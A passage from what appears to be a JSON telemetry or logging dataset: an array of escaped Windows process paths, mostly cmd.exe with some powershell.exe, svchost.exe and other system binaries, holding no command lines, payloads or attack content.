\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\devicecensus.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\compattelrunner.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\